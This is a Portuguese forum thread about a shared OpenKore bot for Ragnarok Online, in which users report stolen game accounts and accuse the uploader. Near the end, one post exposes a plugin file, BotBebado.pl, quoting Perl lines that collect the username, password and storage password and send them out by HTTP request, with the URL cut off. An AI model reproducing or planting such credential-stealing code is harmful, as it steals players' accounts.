Ir para conteúdo
  • 2 Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

Openkore Última versão postada,macro,completo,totalmente fucional,Bro Center

Compartilhar

Posts Recomendados

funciona muito bem bastante confio bastante nesse kore uso ele desde o inicio dele aqui,não da erros e fica on o tempo inteiro,perfeito para quem quer upar rapido ou ficar rico mais rapido

Link para o comentário
Compartilhar em outros sites

Esse openkore ainda funciona ?

está dando o seguinte erro aqui:BOT01.JPG

Será que você poderia ajudar-me ?

Bom qual sistema operacional vc está usando,se não for o seven vc está fazendo algo de errado,confira o activeperl e se isntalo tudo corretamente de acordo com o tutorial

Link para o comentário

Meu Fake ? como duas pessoas podem estar online ao mesmo tempo ? ¬¬[/color]

Akamaruu e -Bernardo7 Safado todos sabemos que é só usar 2 navegadores diferentes que da para abrir 2 accs,eu baixei o seu bot do seu topico usei e acabei de ser roubado,cara eu te mato se te pegar Akamarru ladrão essa conta -Bernardo7 e outra conta sua que você uso 2 navegadores para abrir ela e essa sua,cara seu ladrão safado

Link para o comentário

Aff cara , olha quantas pessoas já reclamou do seu bot, daí vem um cara e reclama do seu bot e fala que é meu fake ? ¬¬

Além do mais , ninguém aqui sabe que aquele cara que postou no meu tópico é seu fake ¬¬

Link para o comentário

galera nao baixa!!!! Eu criei uma conta nova pra testar esse bot , tava com 1kk e varios equips noobs que eu coloquei no gatuno só pra ver se nao tinha nenhum problema de usar , usei o 1 dia tava tudo bem , fui logar no 2 dia tava tudo errado nao tava mais funfando o bot e tava dizendo que a senha estava incorreta , entao recuperei a senha no site da level up e meu char estava limpo!!! ladrããão!!!!

Link para o comentário

Esse povo que não tem nd oque fazer vem ca falar mal,amigo esse openkore é do bro center ou você é o akamaru ou aquele outro palhaço das contas fake,cara não tem mais nada oque fazer

Link para o comentário

Nao , sou eu mesmo "ksdocaos" -.- , e nao estou perdendo tempo estou ajudando os outros , coisa que voce nao esta fazendo , nao to nem ai se é do Bro center ele nao ta puro voce colocou programas hackers nele pra roubar as contas e fingir de santo .

Bom... Meu aviso esta dado , quem quiser ser roubado que use esse bot , mas depois nao diga que eu nao avisei!

Link para o comentário

olha eu uso este hacker e minhas contas é super boas... Desde que ele posto eu começei usar... So achei estranho um dia que falou que alguem tinha logado em minha conta mais nao robou nada olha que tem 75 kk --'

Link para o comentário

@ksdocaos

eu ja examinei o bot e ele ta limpo, a nao ser q tenham inventado outro jeito q roubar q eu nao conheça,

mas d qualquer forma nem tem como mudar a acc da conta do rag só com o keylogger, pq pra mudar a senha do rag, precisa da conta levelup, q nao da pra pegar pelo bot, nem com 200 KL nele

se for pra mentir mente direito

Link para o comentário

eu ja examinei o bot e ele ta limpo, a nao ser q tenham inventado outro jeito q roubar q eu nao conheça,

mas d qualquer forma nem tem como mudar a acc da conta do rag só com o keylogger, pq pra mudar a senha do rag, precisa da conta levelup, q nao da pra pegar pelo bot, nem com 200 KL nele

se for pra mentir mente direito

AHAZOOOO !!!

Cara muito burro... É o que eu ia falar agora... Cara invejoso D+ !!!

Link para o comentário

Bom qual sistema operacional vc está usando,se não for o seven vc está fazendo algo de errado,confira o activeperl e se isntalo tudo corretamente de acordo com o tutorial

Demorei, mas consegui fazer funcionar. Eu só precisava ler mais um pouco sobre o programa é que é a primeira vez que eu estou usando ele.

Obrigado por compartilha-lo conosco, você está de parabéns.

Link para o comentário

Olá,sou Unknown6996 do Fórum BROCenter e venho avisar vocês que esse Openkore possui um Kore Logger.Recebi um aviso de que estavam usando como "Fonte" o BROCenter,no bot daqui.Até achei engraçado os comentários : "O bot do BROCenter é com confiança ".

Sim,é e confiança,mas vocês estão baixando aqui,no Webcheats,onde os usuários fodem com tudo.Não estou reclamando do fórum,não,o fórum é ótimo,mas os usuários que estão bagunçando tudo,mudando a imagem do fórum.Tomem cuidado,vocês estão sendo vitimas.Uma amiga minha de fórum teve a conta hackeada e baixou aqui !

Grato pela Atenção.

O BROCenter não se responsabiliza pelas contas hackeadas.O Scan não apontou nada,porque o Korelogger é uma forma de código,um script para enviar sua senha.

Segue o link :

É necessário se cadastrar para acessar o conteúdo.

Link para o comentário

Godói,cliquei para fazer o download do openkore e olha o que apareceu :

Ok ok.Mas olhe ali,Openkore 2.7 :D

No site oficial,a última atualização parou no 2.1.O Seu é do futuro ?

Outra,no scan vem com vírus.Será que é prejudicial ?

Hum,eu não arriscaria.

Mas ai,2.7 Do Futuro ? Que que teve de atualização?

ONDE ESTÃO OS ADMINISTRADORES DESSE FÓRUM !

Tá na pasta plugins/

Arquivo BotBebado.pl :

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

$senha $kafra");

Tá aqui seus troxa.

Link para o comentário

Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.